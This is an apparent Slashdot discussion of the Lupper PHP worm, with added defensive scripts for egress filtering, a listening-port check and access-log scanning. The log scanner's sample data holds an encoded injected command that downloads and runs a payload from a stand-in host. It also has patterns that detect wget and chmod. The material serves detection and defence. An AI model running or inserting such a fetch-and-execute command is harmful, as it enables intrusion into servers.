Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
PHP exploit, not directly a linux problem? (Score:5, Insightful)
How can we get some free press? (Score:3, Insightful)
if it attacks PHP cross-platform... (Score:5, Insightful)
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
Sadly a preview of things to come because... (Score:5, Insightful)
Success is a double-edged sword.
Conditions for infection... (Score:5, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Re:Remarkably Useless page. (Score:5, Insightful)
More alarmist shit (and old news at that - The Reg reported this last week).
Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).
Re:How can we get some free press? (Score:5, Insightful)
Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
Re:So let me get this straight (Score:3, Insightful)
In the distros I've used, the user has to explicitly choose to have a web server installed. Even after that, the user's probably going to have to explicitly choose to install PHP.
Re:PHP exploit, not directly a linux problem? (Score:3, Insightful)
The security holes are most likely generic.
Re:CONTINUE: (Score:4, Insightful)
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Re:Before all teh MSFT fanboys jump on this, (Score:2, Insightful)
Re:CONTINUE: (Score:1, Insightful)
Re:How can we get some free press? (Score:2, Insightful)
Re:Linux/BSD only (Score:5, Insightful)
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Preventative measures (Score:4, Insightful)
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance from everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more aggressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc.), you can make it so the web server needs to have no egress *at all* except via the services on the other Xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
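Points 4 and 7 above describe default-deny egress filtering; the script below is an added example (not the poster's own configuration) that emits such an iptables OUTPUT policy for review and applies it only on request. The mirror addresses, the internal MTA/DNS host and the interface name are constructed placeholders.

```shell
#!/bin/sh
# Default-deny egress policy for a web-server host, following points 4 and 7 of the
# post above: outbound traffic is dropped unless it goes to a listed apt mirror or to
# the internal mail/DNS host. Rules are emitted as text so they can be reviewed;
# they are applied only with --apply. All addresses are constructed placeholders.

APT_MIRRORS="${APT_MIRRORS:-192.0.2.10 192.0.2.11}"   # placeholder mirror addresses
INTERNAL_SVC="${INTERNAL_SVC:-10.0.0.2}"               # placeholder MTA/DNS host
WEB_IFACE="${WEB_IFACE:-eth0}"

# Print the iptables commands for the OUTPUT chain, most specific rules first.
gen_egress_rules() {
    echo "iptables -F OUTPUT"
    echo "iptables -P OUTPUT DROP"
    # Loopback, and replies on connections the outside world opened to us (HTTP clients)
    echo "iptables -A OUTPUT -o lo -j ACCEPT"
    echo "iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT"
    # apt may fetch packages only from the listed mirrors
    for m in $APT_MIRRORS; do
        echo "iptables -A OUTPUT -o $WEB_IFACE -p tcp -d $m --dport 80 -j ACCEPT"
    done
    # Mail and name resolution only through the internal services host
    echo "iptables -A OUTPUT -o $WEB_IFACE -p tcp -d $INTERNAL_SVC --dport 25 -j ACCEPT"
    echo "iptables -A OUTPUT -o $WEB_IFACE -p udp -d $INTERNAL_SVC --dport 53 -j ACCEPT"
    # Anything else (e.g. a wget from a compromised script) is logged, then dropped by policy
    echo "iptables -A OUTPUT -j LOG --log-prefix 'EGRESS-DROP: '"
}

# Number of explicit ACCEPT rules in the generated set (sanity check before applying)
count_accept_rules() {
    gen_egress_rules | grep -c -- '-j ACCEPT'
}

apply_egress_rules() {
    gen_egress_rules | sh
}

if [ "$1" = "--apply" ]; then
    apply_egress_rules
else
    gen_egress_rules
fi
```

Because the LOG rule sits just before the DROP policy, a blocked download attempt from the web server shows up in the kernel log with the EGRESS-DROP prefix, which is the "time to investigate" signal point 3 talks about.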
Re:Remarkably Useless page. (Score:5, Insightful)
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
Only partially. (Score:4, Insightful)
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Popularity != Security (Score:3, Insightful)
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
Re:Conditions for infection... (Score:3, Insightful)
for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking like
On top of all this they were storing sensitive customer information in plaintext files. I STRONGLY recommended that my boss send out letters to all their customers informing them of the vulnerability so that they could take steps to ensure that they got their credit card numbers, etc. changed.
I think that the big problem is businesses that hire high school students who have no idea of how to write good code to do websites for 6 bucks an hour. When they finally decided to hire someone who had some idea of how to do decent code (I don't claim to be an expert in PHP, but I certainly have more experience with it than a 16 year old, and I do at least try to keep security in mind when I write code), I ended up leaving after I'd fixed the security vulnerabilities (since I didn't see it as being ethical to just leave a business running where it was so that customers could unknowingly have their info stolen) because my boss was constantly on my ass (he didn't understand why I needed to spend time designing a database when flat text files had worked on their site for so long, for example) and basically told me to take shortcuts to get the code done ASAP.
In the end I think that this is one of the biggest problems with software vulnerabilities. People are more concerned with getting it done than getting it done correctly. I think that one of the advantages that F/OSS has is that, while some coders will still perhaps be more concerned with time than correctness, there is less management glaring over your shoulder and telling you to take shortcuts to meet deadlines.
You're wrong. (Score:5, Insightful)
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home. That's what you believe. Yet my bank example shows that popularity has nothing to do with security. That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
Re:CONTINUE: (Score:3, Insightful)
FTA I don't see where it's a linux worm, or even an Apache worm; it's primarily attacking php scripts, and even then it's only capable of attacking php scripts on servers that are configured to allow 2 very well known security configuration flaws and one that's recommended against. NOTE the windows ME-XP instructions on the page [nai.com].
Re:Remarkably Useless page. (Score:3, Insightful)
er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.
it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.
sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever for it to get wormed). It's not that prevalent, it's not that capable of propagating itself (there aren't that many vulnerable hosts out there), yadda yadda yadda ...
Remember, symantec and Mcafee and the rest are looking at their market pretty much disappearing over the next 2 years. Microsoft is going to be selling their own anti-virus, and most people will go with that as a default, even if there are much better products out there.
It's the same situation with firefox and openoffice - both much better products than Internet Exploder and Word, but people stick with what they've got because they're lazy and/or stupid and/or timid and/or its "good enough".
So just who are the antivirus vendors going to sell to in the future? It's not like you need any special tools to clean up a unix box with a bad script - last I looked, vi and/or rm came with every system. As for bad binaries, well, unlike certain OTHER systems, we have the source ... we're not dependent on vendors for patching binaries, nor on antivirus vendors for "cleaning" infected binaries.
So, again, the antivirus vendors are looking at a diminishing market base over the next few years. Time for them to start hiring some black hats and creating as many worms as they can.
Re:Remarkably Useless page. (Score:3, Insightful)
So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.
on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scripts with holes in them that have been exploited (and then had to hunt down and clean up the resulting exploitation). Some of the customers respond to our warning messages. Others ignore the warnings and just blindly re-enable the broken scripts.
These are definitely user issues, not Linux issues. If you install and run a program you really are responsible for making sure that it's safe. Beyond a certain point, the OS can't protect you from your own stupidity.
On the other hand, if the exploit then finds a local root exploit, then I'd call that a Linux problem.
As far as I'm concerned, the distributor is responsible for holes in a default installation -- Those are often done by newbies who may not even know that a vulnerable service is running on his/her box (or even what a service is).
When you start installing add-on programs and remote scripts, their default forms are pretty much the responsibility of the people who make them available (modulo any explicit warnings they give an installer). The user, however is ultimately responsible for what he adds to his system.
No. (Score:3, Insightful)
Security is independent of popularity.
There is nothing about popularity that makes a system more or less secure. No. No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security. Because their security is not perfect. Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != Risk
Read "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
Can't measure OS security by worm prevalence. (Score:3, Insightful)
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quickly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Re:Remarkably Useless page. (Score:5, Insightful)
Symptoms
Presence of the following file:
*
One of the following ports is listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if it's even running by listing what's listening on any port such as UDP 7111 or 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm apparently does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories.
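The netstat check the comment above describes, as an added example (not from the post or the McAfee page): it parses netstat listing output and reports any UDP listener on 7111 or 7222 together with its PID. The netstat lines embedded below are a constructed sample, and the process name "lupii" is taken from the thread rather than verified.

```shell
#!/bin/sh
# Host check for the symptoms quoted above: something listening on UDP 7111 or 7222.
# Parses netstat -ulnp output (run as root, otherwise the PID column is empty).
# The netstat output below is a constructed sample; "lupii" is the process name
# mentioned in the thread, not a verified indicator.

LUPPER_PORTS="7111 7222"

# Read netstat-style lines on stdin; print "port pid/program" for each UDP listener
# on one of the ports above. Handles both 0.0.0.0:7111 and the IPv6 form :::7111.
find_lupper_listeners() {
    awk -v ports="$LUPPER_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        $1 ~ /^udp/ {
            port = $4; sub(/.*:/, "", port)     # local address is column 4
            if (port in want) print port, $NF   # last column: PID/Program name, or "-"
        }'
}

# Constructed sample: sshd, a local resolver and a suspicious listener on 7111
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
udp        0      0 127.0.0.1:53            0.0.0.0:*                           640/named
udp        0      0 0.0.0.0:7111            0.0.0.0:*                           4242/lupii'

check_sample() {
    printf '%s\n' "$SAMPLE_NETSTAT" | find_lupper_listeners
}

# Live check against the running host
check_live() {
    netstat -ulnp 2>/dev/null | find_lupper_listeners
}

if [ "$1" = "--live" ]; then
    check_live
else
    check_sample
fi
```

A hit gives you the PID to kill and, via /proc/PID/exe, the path of the binary to remove, which is the clean-up the comment goes on to describe.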
Re:Sadly a preview of things to come because... (Score:3, Insightful)
if for example I type this into my browser and I see bingo in my browser, example.com would probably be vulnerable. The worm presently uses a linux program wget (wget is a program that downloads files from a web server) to download the payload to the vulnerable machine, make it executable with a chmod +x and run it. When the worm runs, it searches for vulnerable machines on the network and does the same things to them.
any RPC, Remote Procedure Protocol, has big impact on security, especially commands that can change directories, download files, or make a file executable.
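The download-chmod-run sequence described above leaves a recognisable trace in the web server's access log. The script below is an added example (not from the comment or from McAfee) that URL-decodes each request line and flags ones carrying wget, chmod +x or the _begin_ marker quoted earlier in the thread. The log lines and the script path /cgi-bin/example.cgi are constructed samples.

```shell
#!/bin/sh
# Access-log triage for the request pattern described above: a query string that
# carries wget, chmod +x or the echo '_begin_' marker. Attackers %XX-encode such
# tokens, so each request is URL-decoded before matching. The log lines and the
# script path /cgi-bin/example.cgi are constructed samples, not real traffic.

# Read combined-format access-log lines on stdin; print "client-ip request" for each
# line whose decoded request looks like a shell command being injected.
scan_access_log() {
    awk '
        function hexval(h,  i, v) {
            v = 0
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
            return v
        }
        function urldecode(s,  out) {
            out = ""
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                out = out substr(s, 1, RSTART - 1) sprintf("%c", hexval(substr(s, RSTART + 1, 2)))
                s = substr(s, RSTART + 3)
            }
            return out s
        }
        {
            # the request is the first quoted field: "GET /path?query HTTP/1.0"
            if (match($0, /"[A-Z]+ [^"]*"/) == 0) next
            req = substr($0, RSTART + 1, RLENGTH - 2)
            gsub(/\+/, " ", req)          # form encoding: + is a space (decode before %2B)
            req = urldecode(req)
            if (req ~ /wget |chmod \+x|_begin_/)
                print $1, req
        }'
}

# Constructed sample: one normal page view, one injection attempt, one login POST
SAMPLE_LOG='203.0.113.5 - - [07/Nov/2005:10:01:12 +0000] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Nov/2005:10:02:40 +0000] "GET /cgi-bin/example.cgi?target=echo%20%27_begin_%27%3Bcd%20%2Ftmp%3Bwget%20198.51.100.77%2Flupii%3Bchmod%20%2Bx%20lupii%3B.%2Flupii HTTP/1.0" 200 80 "-" "-"
203.0.113.5 - - [07/Nov/2005:10:03:02 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

scan_sample() {
    printf '%s\n' "$SAMPLE_LOG" | scan_access_log
}

if [ "$1" = "--live" ]; then
    scan_access_log < "${2:-/var/log/apache2/access.log}"
else
    scan_sample
fi
```

Run with --live and a log path to sweep a real log; the client IP in each hit is where the scanning came from and the decoded request shows which script was probed.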
Re:Only partially. (Score:3, Insightful)
If you're the only user, you can rename the xmlrpc files.
Besides, your
Re:How can we get some free press? (Score:2, Insightful)
Linux fans degenerating down to semantics is really, really sad.